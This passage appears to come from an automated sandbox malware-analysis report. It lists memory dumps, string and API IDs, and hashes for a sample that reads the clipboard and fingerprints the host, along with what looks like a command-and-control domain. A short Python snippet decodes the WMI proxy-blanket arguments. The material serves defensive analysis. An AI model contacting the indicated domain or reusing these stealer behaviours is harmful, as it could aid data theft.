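        if c["name"] == "CoSetProxyBlanket":
            for key, val in decode_proxy_blanket(c["args"]).items():
                print("  %-15s %s" % (key, val))
    print("WMI client pattern:", looks_like_wmi_client(calls))
```

For this entry the decoder names the blanket as RPC_C_AUTHN_WINNT / RPC_C_AUTHZ_NONE / RPC_C_AUTHN_LEVEL_CALL / RPC_C_IMP_LEVEL_IMPERSONATE / EOAC_NONE, which is exactly the combination Microsoft's WMI client documentation uses before ExecQuery; impersonation on the proxy is what lets the WMI service read hardware classes on the caller's behalf. The same parser can be pointed at other "APIs" blocks in the report, for instance the clipboard-reading function listed below, by swapping the sample text.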
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
• Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
• API String ID: 0-2345621967
• Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
• Instruction ID: 61a7c25add3c2eb78d575bb410489b68ba99ef0bb1d486e7cf9faf3c19471fbb
• Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
• Instruction Fuzzy Hash: 03C1587160C7C58FD315DF2584A076BBFE1AFD2244F1889ADE4E11B782D739890ACB62
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
• API String ID: 0-2345621967
• Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
• Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
• Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
• Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
• API String ID: 0-2174627302
• Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
• Instruction ID: c47d0252fef95e795cc2f919cc7b0789bbb0f975b4fe0699cf3bf39bea5ccefd
• Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
• Instruction Fuzzy Hash: 3C727D7160C7808FD724AB38C4943AFBFE2ABD6314F19892ED5DA87381D6798446CB13
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
• API String ID: 0-2174627302
                                                                                                                                                                                                                                                                                          • Opcode ID: 9cf973d881fcd9ddf1de5dfd39abdee776cd7d1ba05089c60c6876307f8499b0
                                                                                                                                                                                                                                                                                          • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cf973d881fcd9ddf1de5dfd39abdee776cd7d1ba05089c60c6876307f8499b0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07

Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
• API String ID: 0-898000180
• Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
• Instruction ID: 7284c0b006921febe605626328ca0107e5e3020dd22266af322895ab5b66acc7
• Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
• Instruction Fuzzy Hash: 7DC10DB12483518BD714CF58C8A176BB7F2EFE6714F08896DE8D68B790E3358901C796

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: %(#}$/$/26-$1$Wu
• API String ID: 3664257935-3803221125
• Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
• Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
• API String ID: 0-2246970021
• Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction ID: 0b95a4a5ac87f7a12cdeb98e31fa16e5e6f6b5ad0cc6a7354cbd6f5cd4a09f7c
• Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction Fuzzy Hash: A43242B0601B469FDB48CF2AD580389BBB1FF45300F548698C9695FB4ADB35A892CFC0

Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
• API String ID: 0-2246970021
• Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
• Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0

APIs
  • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
• FreeLibrary.KERNEL32(?), ref: 00419CD6
• FreeLibrary.KERNEL32(?), ref: 00419D3B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: ,)*k$I,~M$Wu
• API String ID: 764372645-1153405131
• Opcode ID: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
• Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
• Opcode Fuzzy Hash: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
• Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: *mB$67$@iB$V3R5
• API String ID: 0-119712241
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: %(#}$/$/26-$1
• API String ID: 3664257935-261129489
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: ,)*k$I,~M
• API String ID: 3664257935-936430989
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,$T$U$V$h
• API String ID: 0-1072848446
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &'$0c=e$2g1i$<k;m$B$wy
• API String ID: 0-2430453506
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$0$5$D@6T$EF$zJyL
• API String ID: 0-3264166258
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$0$5$D@6T$EF$zJyL
• API String ID: 0-3264166258
APIs
• GetCurrentProcessId.KERNEL32 ref: 02488A1B
• GetCurrentThreadId.KERNEL32 ref: 02488A25
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02488AC2
• GetForegroundWindow.USER32 ref: 02488AD7
  • Part of subcall function 0248BC37: FreeLibrary.KERNEL32(02488BD2), ref: 0248BC3D
  • Part of subcall function 0248BC37: FreeLibrary.KERNEL32 ref: 0248BC5E
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02488BD9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                          • Instruction ID: 32fc16b6d54a95302a4d4f1d623382d6dc466224f9fb23ff5545f67503981d54
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA417B77F543180BD71CBEA98C993AEB6979BC4314F0A803F6985AB390DE785C0656D0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                                          • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                                          • Opcode ID: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
                                                                                                                                                                                                                                                                                          • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                                          • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                          • Instruction ID: 4e0eea66cff0f6b9496aca2dce0eb99fe8499485080f3b5597ab95928cc6be57
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD118B56183018BD724DF25C8A176BB7F2EFA2314F18996DD4828F3A4F7799401CB52
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction ID: a0e3043ec67e3de6e7873e2ebe6bec725442fe8fe72bc62a0d17d56f8b2c2404
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3A1EA7110D3818BE364CF29C4A07BBBBD2AFE2304F18896ED4DA8B391DB758549C756
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                          • Instruction ID: ce5a0078d03f97aafd8e637aee6b92b66fb343947fb904c4b805f963b4cd0d89
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A1FB7010D3818BE364CF29C4A07BBBBD2AFE2304F18896ED4DA8B391DB758549C756
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: BI$ZG$lev-tolstoi.com$3ej$pr
• API String ID: 0-2504283770
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &-$)R_X$[O_[$zusR
• API String ID: 0-3432275560
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: &-$)R_X$[O_[$zusR
• API String ID: 0-3432275560
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                          • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                          • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                                          • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                                          • Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                                                                                                                                                                                          • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: #$$+oQ$?{;}$DF
                                                                                                                                                                                                                                                                                          • API String ID: 0-1090792222
                                                                                                                                                                                                                                                                                          • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                                                          • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
